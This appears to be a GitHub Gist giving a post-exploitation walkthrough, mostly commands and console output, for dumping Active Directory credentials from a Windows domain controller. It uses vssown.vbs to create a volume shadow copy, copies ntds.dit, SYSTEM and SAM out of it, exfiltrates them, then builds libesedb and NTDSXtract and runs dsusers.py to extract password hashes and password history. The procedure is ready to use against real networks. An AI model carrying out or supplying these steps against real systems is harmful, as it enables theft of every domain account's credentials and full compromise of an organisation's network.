Last active
August 29, 2015 14:06
-
-
Save jstnkndy/ea44cf64dd3a9da02727 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Start the Volume Shadow Service | |
| C:\bak>cscript vssown.vbs /start | |
| Microsoft (R) Windows Script Host Version 5.8 | |
| Copyright (C) Microsoft Corporation. All rights reserved. | |
| [*] Signal sent to start the VSS service. | |
| # Create a Volument Shadow Copy, C is the drive where the files reside, this may not always be C | |
| C:\bak>cscript vssown.vbs /create C | |
| Microsoft (R) Windows Script Host Version 5.8 | |
| Copyright (C) Microsoft Corporation. All rights reserved. | |
| [*] Attempting to create a shadow copy. | |
| # List the Shadow Copy output | |
| C:\bak>cscript vssown.vbs /list | |
| Microsoft (R) Windows Script Host Version 5.8 | |
| Copyright (C) Microsoft Corporation. All rights reserved. | |
| SHADOW COPIES | |
| ============= | |
| [*] ID: {XXX} | |
| [*] Client accessible: True | |
| [*] Count: 1 | |
| [*] Device object: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4 | |
| [*] Differential: True | |
| [*] Exposed locally: False | |
| [*] Exposed name: | |
| [*] Exposed remotely: False | |
| [*] Hardware assisted: False | |
| [*] Imported: False | |
| [*] No auto release: True | |
| [*] Not surfaced: False | |
| [*] No writers: True | |
| [*] Originating machine: DS-DC03.ds.xxx.yyy | |
| [*] Persistent: True | |
| [*] Plex: False | |
| [*] Provider ID: {XXX} | |
| [*] Service machine: DS-DC03.ds.xxx.yyy | |
| [*] Set ID: {XXX} | |
| [*] State: 12 | |
| [*] Transportable: False | |
| [*] Volume name: \\?\Volume{XXX}\ | |
| # Copy the ntds.dit, SYSTEM, and SAM to your local directory from the volume shadow copy location above (\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4) | |
| C:\bak>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\system32\config\SYSTEM . | |
| 1 file(s) copied. | |
| C:\bak>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\system32\config\SAM . | |
| 1 file(s) copied. | |
| C:\bak>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\ntds\ntds.dit . | |
| 1 file(s) copied. | |
| # or at C:\bak>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\ntds\ntds.dit . | |
| # this can also be on another drive such as E:\ so make sure you check that, if that's the case, make a shadow copy of that drive the same as C above | |
| # At this point you will need to copy the ntds.dit, SYSTEM, and SAM to your box by whatever means you would like | |
| # You will need to download the following tools to extract the data out of the files we've copied | |
| wget http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip | |
| wget https://googledrive.com/host/0B3fBvzttpiiSN082cmxsbHB0anc/libesedb-alpha-20120102.tar.gz # thank mubix for this link! | |
| tar zxvf libesedb-alpha-20120102.tar.gz | |
| unzip ntdsxtract_v1_0.zip | |
| root@host:~/# cd libesedb-20120102 | |
| root@host:~/libesedb-20120102# ./configure | |
| root@host:~/libesedb-20120102# make | |
| root@host:~/libesedb-20120102# cd esedbtools/ | |
| root@host:~/libesedb-20120102/esedbtools# ./esedbexport ntds.dit | |
| cd NTDSXtract 1.0/ | |
| python dsusers.py <datatable> <link table> --passwordhashes ../SYSTEM.hive --passwordhistory ../SYSTEM.hive |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment